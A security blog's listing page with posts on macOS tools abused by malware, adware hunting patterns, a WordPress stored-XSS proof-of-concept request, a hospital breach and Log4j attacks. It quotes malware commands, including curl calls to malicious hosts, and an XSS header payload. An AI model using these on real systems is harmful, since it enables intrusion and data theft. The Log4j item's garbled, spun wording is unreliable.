Friday, January 17, 2025
Home Blog Page 64

MACOS: 20 Common Tools Techniques Used by Threat Actors & Malware

By
Steven Black (n0tst3)
-
0
Mac Os hardening security
Mac Os hardening security

Looking back at campaigns directly targeting the macOS platform for the last several years, we have rounded up 20 of the most commonly used built-in tools (ab)used by threat actors, malware, and adware, complete with in-the-wild examples and associated MITRE behavioural indicators. We’ve also added links for each threat so that you can follow up on further details such as IoCs, hashes and researcher analyses.

chmod (/bin/chmod)

Change file modes or Access Control Lists. Generally used by malware in order to give executable permissions to an executable payload retrieved remotely from a C2.

Common Arguments
chmod +x
chmod -R 755
chmod 777

ITW Examples
Bundlore
chmod -R 755 /var/folders/vq/04qz73bd7zb27d3b6r7rc6zr0000gq/T/x.mykHCy73
XCSSET
chmod +x "xcassets"
Shlayer
chmod 777 /tmp/ZQEifWNV2l
SearchMine.Adware
/bin/chmod +x “${tmpFile}”

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • File and Directory Permissions Modification T1222

chown (/usr/sbin/chown)

Change file owner and group. This utility is used by malware to change the user ID and/or the group ID of the specified files. This can lock other users’ out of access to the file, thus hampering removal or inspection. It may also be required in order to execute a file in certain, elevated context.

Common Arguments
chown -R <user[:group]>

ITW Examples
OSX.Dummy
chown root /tmp/script.sh
MMInstall
/usr/sbin/chown -R root:wheel /Applications/MyCouponsmart
/usr/sbin/chown -R root:wheel /Users/user/Applications/SecureMacUpdates

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • File and Directory Permissions Modification T1222

crontab (/usr/bin/crontab)

List, install and remove rules for the cron daemon. Crontab is commonly leveraged as a means to achieve persistence on macOS either in addition to or instead of installing agents and daemons via launchctl. Threat actors may also enumerate existing crontabs in order to manipulate them.

Common Arguments
crontab -l
echo '<*/num> * * * * ' | crontab -

ITW Examples
Empyre
cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'
GravityRAT
sudo crontab -l 2>/dev/null; echo "*/2 * * * * s
Pupy RAT
cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u
VindInstaller
crontab -l > /tmp/file

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

csrutil (/usr/bin/csrutil)

Read System Integrity Protection (SIP) status. Introduced in macOS 10.11, this utility has only one publicly documented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.

Common Arguments
csrutil status

ITW Examples
Bella

if systemVersion.startswith("10.11") or systemVersion.startswith("10.12"):
    csrutil = subprocess.Popen(["csrutil status"], stdout=subprocess.PIPE, shell=True)
    (out, err) = csrutil.communicate()
	if "disabled" in out:
		send_msg(greenPlus + out, False)
		sipEnabled = False #SIP function exists, but is specifically and intentionally disabled! (enterprise environments likely have this config)

MacSearch
/usr/bin/csrutil
OSX.Proton.C
csrutil status

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082

curl (/usr/bin/curl)

Transfer data to or from a server without user interaction. One of the most useful tools in the malware author’s toolkit, curl is used widely in threats of all kinds, from PUPs and adware to trojans, backdoors, and APT implants, in order to download payloads, exfiltrate user data, and track campaigns via unique identifiers. Monitoring for malicious use of curl is a must for all security teams.

Common Arguments
curl -k -s -L -o

ITW Examples
OSX.GMERA
req=`curl -ks "http://owpqkszz.info/link.php?${whoami}&${ip}"`
Shlayer
curl -fsL "$url" >$tmp_path
Bundlore
curl -s -L -o "${dir}/stmp.tar.gz" "${dlUrl}"
OSX.Mami
do curl -L -f -v --create-dirs -o '/Users/user/Library/Application Support/Cyclonica/Cyclonica'
XCSSET
curl --connect-timeout 10 -sk https://flixprice.com/agent/log.php

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Command and Control TA0011
  • Exfiltration TA0010
  • Exfiltration Over Alternative Protocol T1048

dirname (/usr/bin/dirname)

Returns the filename or directory portion of a pathname. The dirname utility and its companion utility basename are both used widely by threat actors as a means of constructing installation paths and locating relative assets based on the executing parent’s location. Whereas dirname returns the full path to the parent of the current working directory, basename returns the name of the current working directory without the preceding path.

Common Arguments
dirname <path>
basename <path>

ITW Examples
XCSSET
dirname /Users/user/Library/LaunchAgents/com.apple.core.accountsd.plist

sh -c basename '/Users/user/Library/Application Scripts/com.apple.AddressBook.Shared/CoreFrameworks/com.oracle.java.sound.app'
OceanLotus
dirname /Users/user/Downloads/ALL tim nha Chi Ngoc Canada.︀doc
MMInstall
dirname /Applications/MyCouponsmart/MyCouponsmart
Shlayer
appDir="$(dirname $(dirname "$currentDir"))"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • File and Directory Discovery T1083

ioreg (/usr/sbin/ioreg)

Displays the I/O Kit registry. This Unix binary is widely used by many malware families to determine the device’s unique ID (for campaign tracking), usually in the form of the machine’s serial number. This may or may not be hashed with another utility (e.g., md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is also used by some threat actors to determine whether the device is running in a virtual environment.

Common Arguments
ioreg -c IOPlatformExpertDevice -d 2 | awk -F'"' '/IOPlatformSerialNumber/{print $(NF-1)}'

ITW Examples
OSX.CpuMeaner
ioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(""", "", $4);print $4}'
OSX.Fruitfly
ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l
OceanLotus
ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, "\""); printf("%s", line[4]); }'

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082

kill (built-in), pkill (/usr/bin/pkill), killall (/usr/bin/killall)

These related commands are used to kill processes (killpkill) and applications (killall). Typically, malware actors use these on macOS for evasion and anti-analysis, such as killing the Activity Monitor or the Terminal to prevent users inspecting processes.

Common Arguments
killall
kill -9
pkill

ITW Examples
macOS.OSAMiner
killall Terminal
XCSSET
xargs kill -9
Bundlore
pkill cfprefsd

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Impair Defenses: Disable or Modify Tools T1562

launchctl (/bin/launchctl)

Interfaces with launchd. For the purposes of malware and threat actors, launchctl is a primary means of executing commands and programs, for stopping system or third-party services, and starting newly created persistence jobs installed as Launch Agents and Launch Daemons.

Common Arguments
launchctl load
launchctl unload
launchctl stop
launchctl start
launchctl remove

ITW Examples
OSX.CoinMiner
launchctl load /Library/LaunchDaemons/com.apple.acc.installer.v1.plist
Lazarus Family
launchctl load -w "%s/Library/LaunchAgents/%s"
FinFisher/FinSpy
/bin/launchctl load
/bin/launchctl unload
OSX.Dummy
launchctl load -w

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Services: Launchctl T1569
  • Scheduled Task/Job: Launchd T1053
  • Create or Modify System Process: Launch Agent T1543.001
  • Create or Modify System Process: Launch Daemon T1543.004

mktemp (/usr/bin/mktemp)

Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the /tmp directory.

Common Arguments
mktemp -d
mktemp -t

ITW Examples
Bundlore
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)
TMP_DIR=`mktemp -d -t x
Shlayer
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

openssl (/usr/bin/openssl)

Cryptography toolkit, openssl is used widely by attackers, often in conjunction with base64, to encode and decode malware to hide it from detection.

Common Arguments
openssl enc -aes-256-cbc -d -A -base64 -k

ITW Examples
EvilOSX
os.popen("openssl req -newkey rsa:4096 -nodes -x509 -days 365 -subj "%s" -sha256 "
MMInstall
/bin/sh -c /usr/sbin/ioreg -c IOPlatformExpertDevice -d 2 | awk -F" '/IOPlatformSerialNumber/{print $(NF-1)}' | tr -d 'n'| openssl md5
Shlayer
openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6"
ZShlayer
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:10598344576 <"$fileDir"/Resources/talon)"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Deobfuscate/Decode Files or Information T1140
  • Encrypted Channel: Asymmetric Cryptography T1573

osacompile (/usr/bin/osacompile)

Compile AppleScripts from given files or standard input into a singe output script. Files may be plain text or other compiled scripts. Osacompile is useful to malware that wants to take advantage of AppleScript’s many powerful features such as controlling other applications’ behaviour, manipulating the GUI, faking user input and phishing for credentials.

Common Arguments
osacompile -x -e
osacompile -x -o

ITW Examples
XCSSET
osacompile -x -e global dFolder
osacompile -x -o /Users/user/Library/Application Scripts/com.apple.AddressBook.Shared/CoreFrameworks/com.apple.core.okcx.app

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Obfuscated Files or Information: Compile After Delivery T1027

osascript (/usr/bin/osascript)

Executes a given AppleScript, which may be plain text or a compiled script (.scpt). Scripts can also be specified line by line using -e switches on the command line, a technique popular among adware and browser manipulating malware. Although AppleScripts can be executed in other ways, osascript is still the most common method used by threat actors. It is also a particular favorite of various open source post-exploitation and RAT tools.

Common Arguments
osascript -e

ITW Examples
EvilOSX
osascript -e 'tell app "iTunes" to activate' -e 'tell app "iTunes" to display dialog "Error connecting to iTunes. Please verify your password”
Pupy RAT
cmd = 'osascript -e 'tell app "Finder" to display dialog "%s"'' % args.text
EggShell
cmd_data["args"] = " -e 'tell application "Finder" to sleep'"
Elite Keylogger
/usr/bin/osascript

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Command and Scripting Interpreter: AppleScript T1059

ps (/bin/ps)

Display information about running processes. The process status (ps) command is to macOS (and Linux) what Tasklist is to Windows: an adversary’s primary means of understanding the device’s current execution environment. Aside from simply enumerating running processes, ps can be used to check on a given process’ start time, elapsed time, resource usage and the login name of the user who started it (among other things).

Common Arguments
ps ax
ps -p -o etime=

ITW Examples
macOS.OSAMiner
ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
OSX.Fruitfly
ps -eAo pid,thcount,ppid,nice,user,command 2>/dev/null
Pirrit
if ps -ef | grep -v grep | grep -q $frm; then
Bella
check_output('ps -p %s -o etime=' % bellaPID)

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

sw_vers (/usr/bin/sw_vers)

Print operating system version information. It is common for malware to determine the macOS version of the target machine both to discover what APIs are available so that the correct payload can be installed and to ascertain what system defences or mitigations may be in place (e.g., System Integrity Protection, User Data Protections like Full Disk Access).

Common Arguments
sw_vers
sw_vers -productName
sw_vers -productVersion
sw_vers -buildVersion

ITW Examples
Bundlore
/usr/bin/sw_vers -productVersion
GravityRAT

osinfo = os.popen('sw_vers -productName').read().strip() + '-' + os.popen('sw_vers -productVersion').read().strip() + '-' + os.popen('sw_vers -buildVersion').read().strip() + ',' + platform.platform()

Lazarus/NukeSped
sw_vers -productName
sw_vers -productVersion
sw_vers -buildVersion

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082

sysctl (/usr/sbin/sysctl)

Retrieve kernel state and allow apps with appropriate privileges to set kernel state. Used by malware as a means of determining whether the execution parent is within a sandbox or virtual machine. The utility can also be used to determine, among other things, the amount of installed memory on the infected device.

Common Arguments
sysctl -n hw.model

ITW Examples
Bella
sysctl -n machdep.cpu.brand_string; hostinfo | grep memory;
EvilOSX
model_key = run_command("sysctl -n hw.model")
Genieo

/usr/sbin/sysctl
hw.optional.x86_64
hw.cpu64bit_capable

OceanLotus
sysctl hw.model

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Virtualization/Sandbox Evasion T1497
  • System Information Discovery T1082

system_profiler (/usr/sbin/system_profiler)

Reports system hardware and software configuration. This built-in utility is a command-line version of the System Information.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis.

Common Arguments
system_profiler SPHardwareDataType
system_profiler SPUSBDataType
system_profiler SPNetworkDataType

ITW Examples
Bundlore
/usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
Empyre
process = subprocess.Popen("system_profiler SPHardwareDataType", stdout=subprocess.PIPE, shell=True)
FinFisher/FinSpy
system_profiler SPUSBDataType | egrep -i "Manufacturer: (parallels|vmware|virtualbox)"
SearchPageInstaller
system_profiler SPNetworkDataType | grep ‘Proxy Enabled’
AMC.PUAGenieo
/usr/sbin/system_profiler SPHardwareDataType

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082
  • Virtualization/Sandbox Evasion T1497

touch (/usr/bin/touch)

The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known as “timestomping”.

Common Arguments
touch
touch -t

ITW Examples
OceanLotus
touch -t 1401140507 /Users/user/Library/User Photos/mount_devfs
Pirrit
touch /Applications/.UpdatesMac15

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Indicator Removal on Host: Timestomp T1070
  • Masquerading T1036

whoami (/usr/bin/whoami)

Display effective user id. Although this utility has been replaced by the more versatile id utility, it is still widely used by malware to retrieve the current user’s name. The whoami command is effectively a synonym for id -un.

Common Arguments
whoami

ITW Examples
EggShell
echo '%@' | sudo -S whoami
whoami
Lazarus
whoami
Pupy RAT
username=`whoami`
OSX.GMERA
whoami="$(remove_spec_char `whoami`)"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Owner/User Discovery T1033

xattr (/usr/bin/xattr)

Display and manipulate extended attributes. Used by malware and threat actors as a means to bypass Gatekeeper and Notarization checks on macOS. Incredibly, any process or user can remove the file attribute that is required for these checks to proceed without admin rights.

Common Arguments
xattr -d com.apple.quarantine
xattr -c
xattr -cr

ITW Examples
OceanLotus
find /Users/user -name *ALL tim nha Chi Ngoc Canada* -exec xattr -d com.apple.quarantine {} + 
XCSSET
/bin/bash -c xattr -cr '/Applications/Google Chrome.app'

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Bypass or Subvert Trust Controls T1553

Conclusion

Many threat actors and malware samples use the same tools on macOS, so monitoring or searching for anomalous use of these tools can help your incident response, threat hunting and blue team efforts.

Looking for a cybersecurity newsletter?

Look no further, read about the Real InfoSecurity Newsletter today and see how it can benefit you.

Bookmark
Please login to bookmarkClose

MacOS: Most Prevalent Adware Infections 2022

By
Steven Black (n0tst3)
-
0
macos
macos

Mac’s Most Prevalent Adware Infections 2022

Last month, as we closed out 2021, we shared the most recent malware discoveries afflicting the Mac platform, covering spyware, targeted attacks on developers and activists, cryptocurrency theft and crypto mining. As worrisome as those are, the bulk of infections affecting Mac users in and out of enterprise settings revolve around adware.

Once little more than a minor nuisance, adware on all platforms has taken a darker turn in recent years, often emulating malware TTPs and regularly surpassing a lot of malware families in sophistication and rapid evolution. What’s driven these developments is simple: adware makes a lot of money. Adware also harvests a lot of data from infections which can be sold off to other actors.

Most importantly from a security team’s point of view, however, is that adware infections set up hidden, persistent executables, engage in the device and environmental fingerprinting, use anti-removal, anti-analysis and detection avoidance techniques, and reach out to unknown URLs to deliver custom payloads, typically without the knowledge or informed consent of the user or, in the enterprise case, the device owner.

For all these reasons, knowing how to detect an adware infection is no less important than any other malware infection. In this post, we shine a light on the most prevalent adware families affecting the Mac platform over the last 3 months and describe the typical infection patterns for each.

Cataloguing and sharing what we know in this way has two benefits. It enables defenders to improve their immediate detections responses in the short-term, and it represents a cost to threat actors in the mid-term, who are forced to invest in retooling and rethinking their approach.

1. Adload System_Service

Adload has probably been around since 2016 and is the most common family we see in live infections today. We include in this entry only those that we have not detailed before or which we saw in the last quarter of 2021 and early 2022.

The System_Service campaign remains the most active of the current variants that we observe.

These follow a determinate pattern:

Hunting Regex

~/Library/Application Support/.[0-9]{19,}/Services/com\..*service/.*.service
/Library/Application Support/.[0-9]{19,}/System/com\..*system/.*.system

Examples

~/Library/Application Support/.16951906660859967924/Services/com.SkilledUnit.service/SkilledUnit.service
/Library/Application Support/.2301650498054541179/System/com.ElementaryType.system/ElementaryType.system

A similar, older but still active pattern does not contain the System or Service terms and does away with the hidden parent folders.

Examples

~/Library/Application Support/com.AdvancedRecord/AdvancedRecord
~/Library/Application Support/com.NetDataSearch/NetDataSearch

2. Adload Go Variant (Rload/Lador)

An increasingly common pattern we are seeing throughout late 2021 involves Adload variants written in either Go (aka Rload/Lador) or Kotlin. The Go variants currently drop a payload with the following file path pattern:

Hunting Regex

Library/Application\ Support/com\.\d{19,21}\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/_\d{19,21}

Example

/Library/Application Support/com.2718493167946217159.4E41C598-9C07-4446-96A4-CE22A41B6BF1/_5214250257291383846

Note that the executable file name only contains numerals. Although the underscore prefix is present more often than not in instances we observed, there are cases of this pattern where the underscore is not present.

3. Adload Kotlin Variant

The Kotlin variant of Adload uses a different but still quite distinctive pattern:

Hunting Regex

/Library/Application\ Support/\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}

Example

~/Library/Application Support/.D41F5C34-0DD1-4F69-9583-AE4E0B2661A3/.F06095AA-5125-41A8-B956-892944655AED

The Kotlin variants also reach out to a server with the pattern:

Hunting Regex

http://m\..*\.com/ktl/uba\?ral=

The wildcard part is consistently made up of two word patterns that mimic the names seen in the Sytem_Service and earlier Adload campaigns.

Examples

http://m.originalrotator.com/ktl/uba?ral=
http://m.bufferrecord.com/ktl/uba?ral=

4. Other Adload Variants

A pattern seen across a number of different variants involves the Adload installer dropping a Mach-O executable in the /tmp/ directory with a filename prefixed with the letters “php” followed by 6 alphanumeric characters (a similar pattern is used by MaxOfferDea/Genieo, which we discuss below)

Hunting Regex

/tmp/php\w{6}

Examples

/tmp/phpO9PLui
/tmp/phpwzmOLI
/tmp/phpZOfJhD
/tmp/php6wmXLq

A much older pattern that we still see occasionally appearing in live infections has the form:

Hunting Regex

/Library/Application\ Support/com\..*Lookup.*Lookup.*
/Library/Application\ Support/com\..*SearchDaemon.*Search.*

Examples

/Library/Application Support/com.OdysseusLookupDaemon/OdysseusLookup
/Library/Application Support/com.ExpertLookupEngineDaemon/ExpertLookupEngine
/Library/Application Support/com.ApolloSearchDaemon/ApolloSearch
/Library/Application Support/com.GlobalToolboxSearchDaemon/GlobalToolboxSearch

There are other minor variants on this naming convention that will be readily recognizable once you are familiar with the above patterns. For more information on this pattern see here.

5. Bundlore, Shlayer, and ZShlayer

Bundlore has been around since at least 2014 and, after Adload, is the most prevalent family we see in live infections throughout 2021 and into the beginning of 2022.

Bundlore payloads are typically dropped by a Shlayer or ZShlayer DMG installer. Often the Shlayer or ZShlayer installer will have one of the following file patterns:

Hunting Regex

/Volumes/Player/Player\.app/Contents/MacOS/\w+
/Volumes/Install/Install\.app/Contents/MacOS/\w+

Examples

/Volumes/Player/Player.app/Contents/MacOS/overprints
/Volumes/Install/Install.app/Contents/MacOS/isolated

Note that in the case of the “Install” pattern, the “I” can appear both as upper and lowercase. We see the “Player” version more often than the “Install” one.

The first stage payload will be dropped in a random folder created in the /tmp/ directory with a corresponding name:

Hunting Regex

/tmp/.{9}/Player\.app/Contents/MacOS/\w+
/tmp/.{9}/install\.app/Contents/MacOS/\w+

Examples

/tmp/0yuEUAw74/Player.app/Contents/MacOS/overprints
/tmp/zWMp9EpUT/Install.app/Contents/MacOS/isolated

Two much older DMG patterns associated with the original Shlayer DMGs, but which only see on rare occasions now are:

Hunting Regex

/Volumes/Player/Player.command
/Volumes/install/.hidden/install.command

6. Pirrit

Pirrit is a macOS malware family that was first seen in 2016 and remained relatively active throughout 2017 but had all but disappeared until November 2021. Since then, Pirrit has seen a new burst of activity.

In common with Bundlore, Pirrit will typically drop via a user executed DMG, although the disk image name and application name tend to be as follows:

/Volumes/Install Flash Player/Install Flash Player

Pirrit’s first stage payload drops in the Darwin_User_Temp_Dir (rather than the system /tmp dir) and uses an 8 character random directory name.

Hunting Regex

/private/var/.*./tmp\..{8}

Examples

/private/var/folders/7d/7skpstwd7qnctfwpwp7225xw0000gn/T/tmp.kfiBqqFO
/private/var/folders/7d/7skpstwd7qnctfwpwp7225xw0000gn/T/tmp.jNuFmF0E

The next stage of the infection usually drops in the Application Support folder with a random name:

Hunting Regex

~/Library/Application\ Support/com\.[a-z]*/[a-z]*

Examples

~/Library/Application Support/com.described/described
~/Library/Application Support/com.memberd/memberd
~/Library/Application Support/com.Searchie/Searchie

A further component is written to a folder in the User’s Library folder and contains an application of the same name:

Hunting Regex

~/Library/(.*)/\1.app/Contents/MacOS/.*

Examples

~/Library/CheckTime/CheckTime.app/Contents/MacOS/CheckTime
~/Library/SysUpdater/SysUpdater.app/Contents/MacOS/SysUpdater

This variant of Pirrit appears to be rapidly evolving. A recent sample installed this application inside the Application Support folder:

~/Library/Application Support/com.SearchZen/SearchZen.app/Contents/MacOS/SearchZen

Depending on permissions when the infection runs, Pirrit may also install some components into /var/root/.

Behaviorally, Pirrit is a good example of adware that attempts evasion techniques that only become apparent upon execution.

VM Detection/Evasion Behavior

/usr/bin/grep grep -q VirtualBox\|Oracle\|VMware\|Parallels

7. MaxOfferDeal / Genieo

Genieo is another long-standing, common macOS malware family that goes in and out of periods of activity. Late 2021 saw some new variants which we continue to track but we have seen little activity. The most prevalent one on our radar uses a persistent LaunchAgent with the following pattern for its program argument:

Example

~/Library/Application Support/.gettime/GetTime

Interestingly, the persistence file is copied from a /tmp/ file that uses a similar naming pattern to Adload, namely “php” followed by 6 characters. This may be coincidence or deliberate, and either way may have caused some vendors to identify one as the other.

The same regex we showed for Adload Mach-Os above, however, will also find these .plist files.

Examples

/tmp/phpEFab3r
/tmp/phpEkFfeu
/tmp/phpkWZyll
/tmp/phpWLcS4s
/tmp/phpWagty2
/tmp/phpHGpcfX
Screen Shot 2022 01 04 at 10.42.49 PM
Screen Shot 2022 01 04 at 10.42.49 PM

However, in the Adload case, these files are always Mach-Os, whereas in the MaxOfferDeal/Genieo case they are always property lists. We see no other indicators or similarities between the executable and known Adload variants.

8. MMInstall/MacUpdater

MMInstall has been around since at least early 2018 and typically installs a LaunchAgent with a program argument with variety of names like “MyShopCoupon”, “CouponSmart” and similar. Older forms typically had an executable with the name “mm-install-macos” but we haven’t seen those for some time.

Apple recently updated their XProtect malware signatures for a newer version of this adware threat that appears to have been active during the middle of 2021. The following domains are still currently active:

Hunting regex

yougotupdated.com
liveforlifetoday.com

Examples

http://tracker.yougotupdated.com
http://installer.yougotupdated.com/offers/macUpdater/updater
https://installer.yougotupdated.com/offers/macUpdater/updater
http://inst.liveforlifetoday.com/offers/macUpdater/updater

The only known installer pattern we have seen to date is as follows.

/Volumes/search/Search.app/Contents/MacOS/Search

Conclusion

Most adware arrives in the form of trojanized applications that users are persuaded to attempt to install. Free content, cracked apps, and “special deals” are typical vectors. The fact that some – although by no means all – adware installers make a show of obtaining user consent doesn’t ameliorate the situation: in the cases where that does happen, the consent mechanism is itself often misleading or aggressive.

Regardless of how it is installed, unless the user has permission from the device owner, then adware will almost certainly be unwanted on company-owned devices. Given the aggressive behaviour of adware, it should be of no less concern than any other type of malware.

We hope the information in this post will aid security teams to identify and removing adware infections on Mac devices. We would also encourage analysts to become familiar with other useful behavioural indicators associated with a wide range of macOS threats including adware families.

source

Read more cybersecurity articles here

Bookmark
Please login to bookmarkClose

WordPress CRM Form Entries Cross-Site Scripting

By
Steven Black (n0tst3)
-
0
EXPLOIT
EXPLOIT

WordPress CRM Form Entries versions prior to 1.1.7 appear susceptible to a cross site scripting vulnerability.

# Description:
WordPress before 5.2.3 allows XSS in post previews by authenticated users.




# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP
in order to save information about the user:
===============================================================================================================
public function get_ip(),
wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is
stored inside the database.


# Proof Of Concept:

Suppose that you have a Contact Form, intercept the POST request and insert
the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback
HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>

------WebKitFormBoundaryCuNGXLnhRsdglEAx

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section
$_SERVER['HTTP_CLIENT_IP']  , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS
is triggered.


# Solution:
Upgrade Contact Form Entries to version 1.1.7

Return to real infosecurity exploit-db

Bookmark
Please login to bookmarkClose

Broward Health warns 1.3 million patients, staff of Data Breach

By
Steven Black (n0tst3)
-
0
data breach

The hospital system says they waited months to notify victims of the breach because the Justice Department asked them to.

This weekend, the Broward Health hospital system notified more than 1.3 million patients and staff members that their personal information was involved in a data breach that started on October 15. 

In a statement on Saturday, the Florida hospital system said that in addition to names, addresses and phone numbers, Social Security numbers, bank account information and medical history data was included in the breach.  

Insurance account information, driver’s license numbers, email addresses and treatments received were also included. The hospital system said it waited months to notify victims because the Department of Justice told them to hold off on sending out breach notification letters. 

“On October 15, 2021, an intruder gained entry to the Broward Health network through the office of a third-party medical provider permitted to access the system to provide healthcare services. Broward Health discovered the intrusion on October 19, 2021, and promptly contained the incident, notified the FBI and the Department of Justice (DOJ), required a password reset for all employees and engaged an independent cybersecurity firm to conduct an investigation,” the hospital explained.

“Broward Health also engaged an experienced data review specialist to conduct an extensive analysis of the data to determine what was impacted, which determined some patient and employee personal information may have been impacted. The DOJ requested the Broward Health briefly delay this notification to ensure that the notification does not compromise the ongoing law enforcement investigation.”

The hospital system did not say how many people were involved, but in their submission to the Maine Attorney General’s office, they said 1,357,879 people were affected. 

image 1
Data Breach, 1,357,879 affected

The hospital is offering 24 months of identity theft protection services, implemented multifactor authentication for all users of its systems and “minimum-security requirements for devices not managed by Broward Health Information Technology with access to its network.”

The notice warned that people who had their information exposed are now vulnerable to medical identity theft, which is when someone uses a person’s name and information to get medical services or fraudulently bill for medical services. The hospital urged those affected to monitor their benefits statements and financial accounts. 

Joseph Carson, the chief security scientist at ThycoticCentrify, said countries where healthcare is extremely expensive, are the leading targets for cybercriminals to steal and monetize personal health information.  

In many instances, personal health information is much more valuable than stolen credit card information, Carson added, noting that it can be sold for up to $500 or more on the dark web because it can easily be abused for fake medical claims, fake prescriptions or fake identities.  

“Personal health information can also be used for extortion or blackmail targeting victims who do not want sensitive information disclosed or even to abuse insurance claims and tax refunds,” Carson said. 

“Unfortunately, for medical records, you cannot change your medical history. Once stolen or disclosed, it is public knowledge, whereas a credit card you can change and get back on track quickly.”

Read more data breach articles here

Bookmark
Please login to bookmarkClose

Chinese Hackers Exploit Academic Institution using Log4J Vulnerability

By
Steven Black (n0tst3)
-
0
Cybersecurity
Cybersecurity

Chinese Hackers Target Academic Institution

A never-before-seen Chinese based focused intrusion adversary, dubbed, “Aquatic Panda” has been found leveraging security flaws in the Apache Log4j logging library.

The Log4J vulnerability was used as an access vector to carry out post-exploitation operations and credentials sniffing.
Cybersecurity organization CrowdStrike stated the infiltration, which turned into in the end foiled, turned into geared toward an unnamed “huge educational institution.”

The state-subsidized institution is thought to have been running since mid-2020 in pursuit of intelligence series and business espionage, with its assaults frequently directed towards groups withinside the telecommunications, technology, and authorities sectors.

The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.

chinese hackers exploit
malware

“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding it involved the use of an exploit that was published in GitHub on December 13, 2021.

